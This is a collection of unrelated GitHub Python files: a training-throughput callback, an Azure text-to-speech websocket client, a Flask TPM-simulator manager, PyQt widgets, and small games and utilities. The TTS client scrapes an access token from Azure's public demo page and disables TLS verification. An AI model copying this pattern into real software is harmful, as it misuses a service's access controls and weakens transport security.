{"seq_id":"72638576168","text":"from __future__ import annotations\n\nimport time\nfrom collections import deque\nfrom typing import Any, Deque, Dict, Optional\n\nfrom composer.core import State\nfrom composer.core.callback import Callback\nfrom composer.loggers import Logger\n\n__all__ = [\"SpeedMonitor\"]\n\n\nclass SpeedMonitor(Callback):\n    \"\"\"Logs the training throughput.\n\n    The training throughput in terms of number of samples per second is logged on the\n    :attr:`~composer.core.event.Event.BATCH_END` event if we have reached the ``window_size`` threshold. Per-epoch\n    average throughput and wall clock train, validation, and total time are also logged on the\n    :attr:`~composer.core.event.Event.EPOCH_END` event.\n\n    Example\n\n    .. doctest::\n\n        >>> from composer.callbacks import SpeedMonitor\n        >>> # constructing trainer object with this callback\n        >>> trainer = Trainer(\n        ...     model=model,\n        ...     train_dataloader=train_dataloader,\n        ...     eval_dataloader=eval_dataloader,\n        ...     optimizers=optimizer,\n        ...     max_duration=\"1ep\",\n        ...     callbacks=[SpeedMonitor(window_size=100)],\n        ... )\n\n    .. 
testcleanup::\n\n        trainer.engine.close()\n\n    The training throughput is logged by the :class:`~composer.loggers.logger.Logger` to the following keys as\n    described below.\n\n    +-----------------------+-------------------------------------------------------------+\n    | Key                   | Logged data                                                 |\n    +=======================+=============================================================+\n    |                       | Rolling average (over ``window_size`` most recent           |\n    | ``samples/step``      | batches) of the number of samples processed per second      |\n    |                       |                                                             |\n    +-----------------------+-------------------------------------------------------------+\n    |                       | Number of samples processed per second (averaged over       |\n    | ``samples/epoch``     | an entire epoch)                                            |\n    +-----------------------+-------------------------------------------------------------+\n    |``wall_clock/train``   | Total elapsed training time                                 |\n    +-----------------------+-------------------------------------------------------------+\n    |``wall_clock/val``     | Total elapsed validation time                               |\n    +-----------------------+-------------------------------------------------------------+\n    |``wall_clock/total``   | Total elapsed time (wall_clock/train + wall_clock/val)      |\n    +-----------------------+-------------------------------------------------------------+\n\n    Args:\n        window_size (int, optional):\n            Number of batches to use for a rolling average of throughput. Defaults to 100.\n    \"\"\"\n\n    def __init__(self, window_size: int = 100):\n        super().__init__()\n        self.train_examples_per_epoch = 0\n\n        # log the total wall clock time that this program has been running for\n        self.wall_clock_total = 0.0\n\n        # log the total wall clock time that has been spent in training\n        self.wall_clock_train = 0.0\n\n        # log the total wall clock time that has been spent in validation\n        self.wall_clock_val = 0.0\n\n        self.epoch_start_time = 0.0\n        self.validation_start_time = 0.0\n        self.epoch_time_in_validation = 0.0\n        self.batch_start_num_samples = None\n        self.batch_end_times: Deque[float] = deque(maxlen=window_size + 1)  # rolling list of batch end times\n        self.batch_num_samples: Deque[int] = deque(maxlen=window_size)  # rolling list of num samples in batch.\n        self.window_size = window_size\n        self.loaded_state: Optional[Dict[str, Any]] = None\n\n    def state_dict(self) -> Dict[str, Any]:\n        \"\"\"Returns a dictionary representing the internal state of the SpeedMonitor object.\n\n        The returned dictionary is pickle-able via :func:`torch.save`.\n\n        Returns:\n            Dict[str, Any]: The state of the SpeedMonitor object\n        \"\"\"\n        current_time = time.time()\n        return {\n            \"train_examples_per_epoch\": self.train_examples_per_epoch,\n            \"wall_clock/train\": self.wall_clock_train,\n            \"wall_clock/val\": self.wall_clock_val,\n            \"wall_clock/total\": self.wall_clock_total,\n            \"epoch_duration\": current_time - self.epoch_start_time,\n            \"batch_durations\": [current_time - x for x in self.batch_end_times],\n            \"batch_num_samples\": self.batch_num_samples,\n        }\n\n    def load_state_dict(self, state: Dict[str, Any]) -> None:\n        \"\"\"Restores the state of the SpeedMonitor object.\n\n        Args:\n            state (Dict[str, Any]): The state of the object,\n                as previously returned by :meth:`.state_dict`\n        \"\"\"\n        self.loaded_state = state\n\n    def _load_state(self) -> None:\n        current_time = time.time()\n        if self.loaded_state is not None:\n            self.train_examples_per_epoch = self.loaded_state[\"train_examples_per_epoch\"]\n            self.wall_clock_train = self.loaded_state[\"wall_clock/train\"]\n            self.wall_clock_val = self.loaded_state[\"wall_clock/val\"]\n            self.wall_clock_total = 
self.loaded_state[\"wall_clock/total\"]\n self.epoch_start_time = current_time - self.loaded_state[\"epoch_duration\"]\n self.batch_end_times = deque([current_time - x for x in self.loaded_state[\"batch_durations\"]],\n maxlen=self.window_size + 1)\n self.batch_num_samples = self.loaded_state[\"batch_num_samples\"]\n self.loaded_state = None\n\n def batch_start(self, state: State, logger: Logger) -> None:\n del logger # unused\n self._load_state()\n self.batch_start_num_samples = state.timestamp.sample\n\n def epoch_start(self, state: State, logger: Logger):\n del state, logger # unused\n self._load_state()\n self.epoch_start_time = time.time()\n self.batch_end_times.clear()\n self.batch_num_samples.clear()\n self.train_examples_per_epoch = 0\n\n def batch_end(self, state: State, logger: Logger):\n self.batch_end_times.append(time.time())\n new_num_samples = state.timestamp.sample\n assert self.batch_start_num_samples is not None, \"self.batch_start_num_samples should have been set on Event.BATCH_START\"\n batch_num_samples = int(new_num_samples - self.batch_start_num_samples)\n self.batch_num_samples.append(batch_num_samples)\n self.train_examples_per_epoch += batch_num_samples\n if len(self.batch_end_times) == self.window_size + 1:\n throughput = sum(self.batch_num_samples) / (self.batch_end_times[-1] - self.batch_end_times[0])\n logger.data_batch({'samples/step': throughput})\n\n def eval_start(self, state: State, logger: Logger):\n del state, logger # unused\n self.validation_start_time = time.time()\n\n def eval_end(self, state: State, logger: Logger):\n del state, logger # unused\n self.epoch_time_in_validation += time.time() - self.validation_start_time\n\n def epoch_end(self, state: State, logger: Logger):\n del state # unused\n\n epoch_time_in_train = time.time() - self.epoch_start_time - self.epoch_time_in_validation\n self.wall_clock_train += epoch_time_in_train\n self.wall_clock_val += self.epoch_time_in_validation\n self.wall_clock_total += epoch_time_in_train + self.epoch_time_in_validation\n assert (self.wall_clock_train + self.wall_clock_val) == self.wall_clock_total\n\n logger.data_epoch({\n \"wall_clock/train\": self.wall_clock_train,\n })\n logger.data_epoch({\n \"wall_clock/val\": self.wall_clock_val,\n })\n logger.data_epoch({\n \"wall_clock/total\": self.wall_clock_total,\n })\n logger.data_epoch({\n \"samples/epoch\": self.train_examples_per_epoch / epoch_time_in_train,\n })\n self.epoch_time_in_validation = 0.0\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/callbacks/speed_monitor.py","file_name":"speed_monitor.py","file_ext":"py","file_size_in_byte":8194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22095233570","text":"from asyncio import tasks\r\nimport asyncio\r\nimport websockets\r\nimport re\r\nimport shortuuid\r\nimport asyncio\r\nfrom websockets import connection, client\r\nimport websockets\r\nfrom datetime import datetime\r\nimport logging\r\nimport json\r\nfrom websockets.extensions.permessage_deflate import (\r\n ServerPerMessageDeflateFactory,\r\n ClientPerMessageDeflateFactory,\r\n)\r\nfrom websocket import create_connection\r\nfrom uuid import uuid1, uuid4\r\nfrom requests import Session\r\nimport simpleaudio as sa\r\nimport sounddevice as sd\r\nimport soundfile as sf\r\nfrom playsound import playsound\r\n\r\n# TTS文字转语音\r\nclass TTS:\r\n def __init__(self):\r\n self.request = Session()\r\n self.headers = {\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n            \"referer\": \"https://azure.microsoft.com\",\r\n            \"origin\": \"https://azure.microsoft.com/\",\r\n            \"authorization\": \"\",\r\n        }\r\n        self.wss_url = (\r\n            \"wss://eastus.tts.speech.microsoft.com/cognitiveservices/websocket/v1\"\r\n        )\r\n\r\n        self.auth = \"Authorization\"\r\n        self.token = \"\"\r\n        # Parameter list\r\n        self.params_list = []\r\n        self.ws = None\r\n        # Audio data list\r\n        self.audio_map = {}\r\n        # Current request id\r\n        self.now_request = \"\"\r\n\r\n        self.get_token()\r\n\r\n        # websocket logging\r\n        logger = logging.getLogger(\"websockets\")\r\n        # logger = logging.getLogger(\"websockets.client\")\r\n        logger.setLevel(logging.DEBUG)\r\n        logger.addHandler(logging.StreamHandler())\r\n\r\n        # Platform info\r\n        self.platform = {\r\n            \"context\": {\r\n                \"system\": {\r\n                    \"name\": \"SpeechSDK\",\r\n                    \"version\": \"1.19.0\",\r\n                    \"build\": \"JavaScript\",\r\n                    \"lang\": \"JavaScript\",\r\n                },\r\n                \"os\": {\r\n                    \"platform\": \"Browser/Win32\",\r\n                    \"name\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n                    \"version\": \"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n                },\r\n            }\r\n        }\r\n        # Voice info\r\n        self.voice = {\r\n            \"synthesis\": {\r\n                \"audio\": {\r\n                    \"metadataOptions\": {\r\n                        \"bookmarkEnabled\": False,\r\n                        \"sentenceBoundaryEnabled\": False,\r\n                        \"visemeEnabled\": False,\r\n                        \"wordBoundaryEnabled\": False,\r\n                    },\r\n                    \"outputFormat\": \"audio-24khz-160kbitrate-mono-mp3\",\r\n                },\r\n                \"language\": {\"autoDetection\": False},\r\n            }\r\n        }\r\n\r\n    @property\r\n    def authorization(self):\r\n        return f\"Bearer {self.token}\"\r\n\r\n    # Connection id\r\n    @property\r\n    def connection_id(self):\r\n        return shortuuid.ShortUUID().random(32)\r\n\r\n    # Request id\r\n    @property\r\n    def requestId(self):\r\n        # return shortuuid.ShortUUID().random(32).upper()\r\n        return str(uuid1()).replace(\"-\", \"\").upper()\r\n        # return \"EC7237308086480693BFEE6A20044BF3\"\r\n\r\n    @property\r\n    def ws_url(self):\r\n        return f\"{self.wss_url}?Authorization=bearer%20{self.token}&X-ConnectionId={self.connection_id}\"\r\n\r\n    # Current time as a string\r\n    @property\r\n    def now_time(self):\r\n        now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")\r\n        return now[:-3] + \"Z\"\r\n\r\n    # Fetch the token from the landing page\r\n    def get_token(self):\r\n        \"\"\"\r\n        url:https://azure.microsoft.com/zh-cn/services/cognitive-services/text-to-speech/\r\n        \"\"\"\r\n        logging.debug(\"Fetching token\")\r\n        result = self.request.get(\r\n            \"https://azure.microsoft.com/zh-cn/services/cognitive-services/text-to-speech/\",\r\n            headers={\r\n                \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\"\r\n            },\r\n            proxies={\"http\": \"\", \"https\": \"\"},\r\n            verify=False,\r\n        )\r\n        if result.status_code != 200:\r\n            print(\"Token request failed\", result.status_code)\r\n            return\r\n        data = result.text\r\n        reg = re.compile(r'token: \"(.*?)\"')\r\n        token_list = reg.findall(data)\r\n        if len(token_list) <= 0:\r\n            print(\"No token found\")\r\n            return\r\n        self.token = token_list[0]\r\n        self.headers[\"authorization\"] = self.authorization\r\n        print(self.token)\r\n\r\n    # Fetch data\r\n    def get_data(\r\n        self,\r\n    ):\r\n        \"\"\"\r\n        url:https://eastus.tts.speech.microsoft.com/cognitiveservices/voices/list\r\n        \"\"\"\r\n        logging.debug(\"Fetching data\")\r\n        result = self.request.get(\r\n            \"https://eastus.tts.speech.microsoft.com/cognitiveservices/voices/list\",\r\n            headers=self.headers,\r\n            
proxies={\"http\": \"\", \"https\": \"\"},\r\n            verify=False,\r\n        )\r\n\r\n        if result.status_code != 200:\r\n            print(\"Request failed\", result.status_code)\r\n            return\r\n        data = result.json()\r\n        self.params_list = data\r\n\r\n    # Connect to the WebSocket\r\n    def connect_ws(self, sync=False):\r\n        self.get_data()\r\n        # ws = await websockets.connect(\r\n        #     self.ws_url,\r\n        #     origin=\"https://azure.microsoft.com\",\r\n        #     extra_headers={\r\n        #         \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n        #         \"Host\": \"eastus.tts.speech.microsoft.com\",\r\n        #     },\r\n        #     extensions=[ClientPerMessageDeflateFactory(client_max_window_bits=True)],\r\n        # )\r\n        print(self.ws_url)\r\n        ws = create_connection(self.ws_url)\r\n        self.ws = ws\r\n        return self.ws\r\n\r\n    # Connect to the WebSocket asynchronously\r\n    async def async_connect_ws(self):\r\n        self.get_data()\r\n        print(self.ws_url)\r\n        cookie_dict = self.request.cookies.get_dict()\r\n        cookie_list = []\r\n        for key in cookie_dict:\r\n            cookie_list.append(f\"{key}={cookie_dict[key]}\")\r\n        ws = await websockets.connect(\r\n            self.ws_url,\r\n            # origin=\"https://azure.microsoft.com\",\r\n            extra_headers={\r\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n                # \"Host\": \"eastus.tts.speech.microsoft.com\",\r\n                # \"Cookie\": \";\".join(cookie_list),\r\n            },\r\n            extensions=[ClientPerMessageDeflateFactory(client_max_window_bits=True)],\r\n        )\r\n        self.ws = ws\r\n        return self.ws\r\n\r\n        # async with websockets.connect(\r\n        #     self.ws_url,\r\n        #     # No extra request headers needed\r\n        #     # extra_headers={\r\n        #     #     \"Host\": \"eastus.tts.speech.microsoft.com\",\r\n        #     #     \"Origin\": \"https://azure.microsoft.com\",\r\n        #     #     \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\r\n        #     #     \"Sec-WebSocket-Extensions\": \"permessage-deflate; client_max_window_bits\",\r\n        #     #     \"Sec-WebSocket-Key\": \"7mupLdK2iBPG7DudstgUPA==\",\r\n        #     #     \"Sec-WebSocket-Version\": \"13\",\r\n        #     # },\r\n        # ) as ws:\r\n        #     self.ws = ws\r\n        #     while True:\r\n        #         data = await ws.recv()\r\n        #         print(data)\r\n\r\n    # # Before sending data\r\n    # def before_send(self):\r\n    #     if not self.flag:\r\n    #         # Step one\r\n    #         self.ws.send(\r\n    #             \"\"\"Path: speech.config\r\n    # X-RequestId: B237EEEEDBE7442DB3889EDB6C76A245\r\n    # X-Timestamp: 2022-05-21T03:50:01.359Z\r\n    # Content-Type: application/json\r\n\r\n    # {\"context\":{\"system\":{\"name\":\"SpeechSDK\",\"version\":\"1.19.0\",\"build\":\"JavaScript\",\"lang\":\"JavaScript\"},\"os\":{\"platform\":\"Browser/Win32\",\"name\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\",\"version\":\"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36\"}}}\"\"\"\r\n    #         )\r\n    #         # Step two\r\n    #         self.ws.send(\r\n    #             \"\"\"Path: synthesis.context\r\n    # X-RequestId: B237EEEEDBE7442DB3889EDB6C76A245\r\n    # X-Timestamp: 2022-05-21T03:50:01.360Z\r\n    # Content-Type: application/json\r\n\r\n    # {\"synthesis\":{\"audio\":{\"metadataOptions\":{\"bookmarkEnabled\":false,\"sentenceBoundaryEnabled\":false,\"visemeEnabled\":false,\"wordBoundaryEnabled\":false},\"outputFormat\":\"audio-24khz-160kbitrate-mono-mp3\"},\"language\":{\"autoDetection\":false}}}\"\"\"\r\n    #         )\r\n    #         self.ws.send(\r\n    #             \"\"\"Path: ssml\r\n    # X-RequestId: B237EEEEDBE7442DB3889EDB6C76A245\r\n    # X-Timestamp: 2022-05-21T03:50:01.360Z\r\n    # Content-Type: 
application/ssml+xml\r\n\r\n    # You can replace this text with any text you wish. You can write in this text box or paste your own text here.\r\n\r\n    # Try different languages and voices. Change the speaking rate and pitch. You can even tweak the SSML (Speech Synthesis Markup Language) to control how different parts of the text sound. Click SSML above to give it a try!\r\n\r\n    # Enjoy using Text to Speech!\"\"\"\r\n    #         )\r\n    #         self.flag = True\r\n\r\n    # Text to speech\r\n    def text_to_speech(self, text: str):\r\n        if not self.ws:\r\n            self.connect_ws()\r\n\r\n        requestId = self.requestId\r\n        self.now_request = requestId\r\n        now = self.now_time\r\n        payload = f\"\"\"Path: speech.config\r\nX-RequestId: {requestId}\r\nX-Timestamp: {now}\r\nContent-Type: application/json\r\n\r\n{json.dumps(self.platform,separators=(',', ':'))}\"\"\"\r\n        self.ws.send(payload)\r\n        payload = f\"\"\"Path: synthesis.context\r\nX-RequestId: {requestId}\r\nX-Timestamp: {now}\r\nContent-Type: application/json\r\n\r\n{json.dumps(self.voice,separators=(',', ':'))}\"\"\"\r\n        self.ws.send(payload)\r\n        payload = f\"\"\"Path: ssml\r\nX-RequestId: {requestId}\r\nX-Timestamp: {now}\r\nContent-Type: application/ssml+xml\r\n\r\n{text}\"\"\"\r\n        self.ws.send(payload)\r\n        data = self.ws.recv()\r\n        print(data)\r\n\r\n    # Text to speech, async version\r\n    async def text_to_speech_async(self, text: str):\r\n        if not self.ws:\r\n            await self.async_connect_ws()\r\n\r\n        requestId = self.requestId\r\n        self.now_request = requestId\r\n        now = self.now_time\r\n        payload = f\"\"\"Path: speech.config\\r\\nX-RequestId: {requestId}\\r\\nX-Timestamp: {now}\\r\\nContent-Type: application/json\\r\\n\\r\\n{json.dumps(self.platform,separators=(',', ':'))}\"\"\"\r\n        await self.ws.send(payload)\r\n        payload = f\"\"\"Path: synthesis.context\\r\\nX-RequestId: {requestId}\\r\\nX-Timestamp: {now}\\r\\nContent-Type: application/json\\r\\n\\r\\n{json.dumps(self.voice,separators=(',', ':'))}\"\"\"\r\n        await self.ws.send(payload)\r\n        payload = f\"\"\"Path: ssml\\r\\nX-RequestId: {requestId}\\r\\nX-Timestamp: {now}\\r\\nContent-Type: application/ssml+xml\\r\\n\\r\\n{text}\"\"\"\r\n        await self.ws.send(payload)\r\n\r\n    # Listen for messages\r\n    async def listen(self):\r\n        while True:\r\n            msg = await self.ws.recv()\r\n            print(msg)\r\n            self.parse_audio({\"data\": msg, \"requestId\": self.now_request})\r\n            # try:\r\n            # except websockets.exceptions.ConnectionClosed as e:\r\n            #     print(\"Connection closed\")\r\n            #     print(e)\r\n            #     break\r\n\r\n    # Parse audio messages\r\n    def parse_audio(self, params: dict):\r\n        if not params:\r\n            return\r\n\r\n        data = params.get(\"data\", b\"\")\r\n        requestId = params.get(\"requestId\")\r\n\r\n        if isinstance(data, bytes):\r\n            # Parse the data\r\n            header_len = 130\r\n            start_byte = b\"\\x00\\x80\"\r\n            request_byte = data[\r\n                len(start_byte) : len(f\"X-RequestId:{requestId}\") + len(start_byte)\r\n            ]\r\n            contentType_byte = data[48:71]\r\n            streamId_byte = data[73:116]\r\n            path_type = data[118:128]\r\n\r\n            # Add the data\r\n            if not self.audio_map.get(requestId):\r\n                self.audio_map.setdefault(requestId, [])\r\n\r\n            body = data[header_len:]\r\n            if body:\r\n                self.audio_map[requestId].append(body)\r\n        elif isinstance(data, str):\r\n            if data.find(\"end\") != -1:\r\n                self.play_audio(self.now_request)\r\n                return\r\n\r\n    # Play the audio\r\n    def play_audio(self, requestId: str):\r\n        audio_data = b\"\".join(self.audio_map.get(requestId, []))\r\n        # winsound.PlaySound(audio_data, winsound.SND_MEMORY)\r\n        # with open(r\"C:\\Users\\scp\\Desktop\\test.mp3\", \"wb\") as f:\r\n        with open(\"./test.wav\", \"wb\") as f:\r\n            f.write(audio_data)\r\n        # audio = pyaudio.PyAudio()\r\n        # stream = audio.open(format=pyaudio.paInt16, channels=1, rate=16000, output=True)\r\n        # stream.write(audio_data)\r\n        # dt = sa.play_buffer(audio_data, 2, 3, 44100)\r\n        # sd.OutputStream(\r\n        # 
samplerate=44100, blocksize=1024, device=0, fs=audio_data\r\n # ).start()\r\n # playsound(audio_data)\r\n # playsound(\"./test.wav\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n client = TTS()\r\n\r\n # client.connect_websocket()\r\n # client.text_to_speech(\"测试\")\r\n loop = asyncio.get_event_loop()\r\n conn = loop.run_until_complete(client.async_connect_ws())\r\n tasks = [\r\n asyncio.ensure_future(client.listen()),\r\n asyncio.ensure_future(client.text_to_speech_async(\"竟然没有一个能用的包\")),\r\n ]\r\n loop.run_until_complete(asyncio.wait(tasks))\r\n","repo_name":"xinlingqudongX/tts-voice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14874,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74265865446","text":"import subprocess\nimport shlex\nimport shutil\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n@app.route(\"/restart_tpm\", methods=[\"POST\"])\ndef restart_tpm():\n response = {}\n try:\n restart_tpm_cmd = shlex.split(\"/root/tpm2simulator/restart_tpm.sh\")\n read_key_output = subprocess.check_output(\n restart_tpm_cmd, stderr=subprocess.STDOUT)\n response = jsonify({'result': True})\n response.status_code = 200\n except Exception as e:\n response = jsonify({\"result\": False, \"error\": str(e)})\n response.status_code = 500\n return response\n\n\n@app.route(\"/reset_tpm\", methods=[\"POST\"])\ndef reset_tpm():\n response = {}\n try:\n reset_tpm_cmd = shlex.split(\"/root/tpm2simulator/reset_tpm.sh\")\n read_key_output = subprocess.check_output(\n reset_tpm_cmd, stderr=subprocess.STDOUT)\n response = jsonify({'result': True})\n response.status_code = 200\n except Exception as e:\n response = jsonify({\"result\": False, \"error\": str(e)})\n response.status_code = 500\n return response\n","repo_name":"nokia/tpm-study-environment","sub_path":"tpm-manager/tpm-manager.py","file_name":"tpm-manager.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22470141662","text":"from PyQt5.QtCore import QObject, QSize, Qt\nfrom PyQt5.QtGui import QPen, QColor\nfrom PyQt5.QtWidgets import QStyle, QComboBox, QAbstractItemDelegate, QStyledItemDelegate\n\n\nclass QPenStyleDelegate(QAbstractItemDelegate):\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def paint(self, painter, option, index):\n test = index.data(Qt.DisplayRole)\n penStyle = index.data(Qt.UserRole)\n r = option.rect\n\n if (option.state & QStyle.State_Selected):\n painter.save()\n painter.setBrush(option.palette.highlight())\n painter.setPen(Qt.NoPen)\n painter.drawRect(option.rect)\n painter.setPen(QPen(option.palette.highlightedText(), 2, penStyle))\n else:\n painter.setPen(penStyle)\n\n painter.drawLine(0, r.y() + r.height() / 2, r.right(), r.y() + r.height() / 2)\n\n if (option.state & QStyle.State_Selected):\n painter.restore()\n\n def sizeHint(self,option,index):\n return QSize(100, 30)\n\nclass QLineComboBox(QComboBox):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setItemDelegate(QPenStyleDelegate())\n\nclass QColorComboBox(QComboBox):\n def __init__(self, parent=None):\n super().__init__(parent)\n for i, clr in enumerate(QColor.colorNames()):\n self.addItem(clr, QColor(clr).name())\n self.model().item(i).setBackground(QColor(clr))\n\n# class 
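# Illustration of the websocket text-frame layout used by the TTS client
# above: header lines, a blank line, then the body. The helper name and the
# sample values are invented for this sketch.
def build_frame(path, request_id, timestamp, content_type, body):
    return (f"Path: {path}\r\n"
            f"X-RequestId: {request_id}\r\n"
            f"X-Timestamp: {timestamp}\r\n"
            f"Content-Type: {content_type}\r\n\r\n"
            f"{body}")

print(build_frame("speech.config", "ABC123", "2022-05-21T03:50:01.359Z",
                  "application/json", "{}"))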
MyQStyledItemDelegate(QStyledItemDelegate):\n# def __init__(self, height, parent=None):\n# super().__init__(height,parent)\n# self.m_Height=height\n#\n# def sizeHint(self, option, index):\n# size = QStyledItemDelegate.sizeHint(option, index)\n# size.setHeight(self.m_Height)\n# return size\n#\n# def paint(painter, option, index):\n# super().paint(painter, option, index)\n\nif __name__ == \"__main__\":\n from PyQt5.QtWidgets import *\n import sys\n app = QApplication(sys.argv)\n w = QLineComboBox()\n w.addItem(\"Solid\",Qt.SolidLine)\n w.addItem(\"Dot\",Qt.DotLine)\n w.currentIndexChanged.connect(lambda :print(w.currentData()))\n w.show()\n sys.exit(app.exec_())","repo_name":"hustlei/GraphDigitizer","sub_path":"src/core/widgets/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39922224030","text":"import utils\nimport pandas as pd\nimport pytorch_lightning as pl\nimport train\n\nCFG = {\n 'train_path': 'data/train.csv',\n 'test_path': 'data/test.csv',\n # 'model_name': 'microsoft/deberta-base',\n 'model_name': 'bert-base-uncased',\n 'max_len': 512,\n 'train_batch_size': 16,\n 'valid_batch_size': 16,\n 'dropout': 0.5,\n 'num_classes': 6,\n 'lr': 1e-5,\n 'epochs': 1\n\n}\nif __name__ == \"__main__\":\n utils.download_dataset(\"data\", \"kaggle competitions download -c feedback-prize-english-language-learning\", \"feedback-prize-english-language-learning.zip\")\n\n # train = pd.read_csv(\"data/train.csv\")\n # print(train.head())\n # test = pd.read_csv(\"data/test.csv\") \n\n train.train(CFG)\n\n","repo_name":"tbass134/Feedback-Prize---English-Language-Learning","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32456072580","text":"import random\r\nfrom art import logo\r\n\r\nprint(logo)\r\n\r\ncards_list = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\nboo_choice = [True, False]\r\n\r\n\r\ndef player(x1, x2, comp=False):\r\n if x1 == 11 and x1 + x2 > 21:\r\n x1 = 1\r\n elif x2 == 11 and x1 + x2 > 21:\r\n x2 = 1\r\n in_hands = [x1, x2]\r\n if comp:\r\n print(f\"Computer's cards are {x1} and X\")\r\n else:\r\n print(f\"Your cards are {x1} and {x2}\")\r\n\r\n sum_of_cards = sum(in_hands)\r\n return sum_of_cards\r\n\r\n\r\ndef game(player1, player2):\r\n question = input(\"Do you want to open (o) your cards or take another(t): \").lower()\r\n if question == \"o\":\r\n print(f\"Computer's cards sum was {player2}\")\r\n if player1 > 21:\r\n return False\r\n elif player1 > player2:\r\n comp_choose = random.choice(boo_choice)\r\n if comp_choose:\r\n new_card = random.choice(cards_list)\r\n player2 += new_card\r\n print(f\"New computer's cards sum wis {player2}\")\r\n if 22 > player2 > player1:\r\n return False\r\n elif 22 > player1 > player2:\r\n return True\r\n else:\r\n return True\r\n\r\n elif player1 < player2 < 22:\r\n return False\r\n else:\r\n return True\r\n elif question == \"t\":\r\n new_card = random.choice(cards_list)\r\n print(f\"The new card is {new_card}\")\r\n player1 += new_card\r\n if player1 > 21:\r\n return False\r\n print(f\"Computer's cards sum was {player2}\")\r\n comp_choose = random.choice(boo_choice)\r\n if comp_choose:\r\n new_card = random.choice(cards_list)\r\n player2 += new_card\r\n print(f\"New computer's cards sum wis {player2}\")\r\n if 22 > player2 > player1:\r\n return False\r\n elif 22 > 
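# Illustration: the commented-out MyQStyledItemDelegate above passes `height`
# to super().__init__ and calls QStyledItemDelegate.sizeHint without `self`.
# A corrected sketch of the fixed-row-height idea; the class name is invented.
from PyQt5.QtWidgets import QStyledItemDelegate

class FixedHeightDelegate(QStyledItemDelegate):
    def __init__(self, height, parent=None):
        super().__init__(parent)   # only `parent` belongs to the base class
        self.m_height = height

    def sizeHint(self, option, index):
        size = super().sizeHint(option, index)  # bound call supplies self
        size.setHeight(self.m_height)
        return size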
player1 > player2:\r\n return True\r\n else:\r\n return True\r\n\r\n\r\nrunning = True\r\n\r\nwhile running:\r\n print(\"\\n\")\r\n card1 = random.choice(cards_list)\r\n card2 = random.choice(cards_list)\r\n card3 = random.choice(cards_list)\r\n card4 = random.choice(cards_list)\r\n computer = True\r\n winning = game(player(card1, card2), player(card3, card4, comp=computer))\r\n if winning:\r\n print(\"You have won!\")\r\n else:\r\n print(\"You have lost.\")\r\n play_again = input(\"Do you want to continue? (y/n)\").lower()\r\n if play_again == \"y\":\r\n running = True\r\n else:\r\n running = False\r\n\r\n","repo_name":"Milan325/Blackjack-card-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38360837738","text":"import sys\r\n\r\n\r\ndef main(file_path):\r\n list_of_lines = []\r\n zana_cavas = ['Cavas, Forgotten Spirit:', 'Zana, Master Cartographer:']\r\n\r\n print('Creating lines.txt file.')\r\n with open(file_path, 'r', encoding='utf-8') as f:\r\n for line in f:\r\n if 'Cavas, Forgotten Spirit:' in line: # first encounter with cavas \r\n list_of_lines.append(line) \r\n for line in f: # look for zana or cavas memories\r\n if any(x in line for x in zana_cavas):\r\n list_of_lines.append(line)\r\n\r\n f = open('lines.txt', 'w', encoding='utf-8')\r\n for item in list_of_lines:\r\n f.write(item)\r\n input('Done! Press any key to continue...')\r\n\r\nif __name__ == \"__main__\":\r\n txt = input(r\"Copy path to your Client.txt file (e.g. C:\\Program Files (x86)\\Grinding Gear Games\\Path of Exile\\logs\\Client.txt): \")\r\n main(txt)\r\n","repo_name":"MarkoAdamko/poe_extractor","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21407354843","text":"\"\"\"\nPlotting csv files.\n\nAuthor: Nicoline Louise Thomsen\n\"\"\"\n\nimport csv as csv_libary\nimport matplotlib.pyplot as plt\n\n\nclass CSVprocessor:\n def 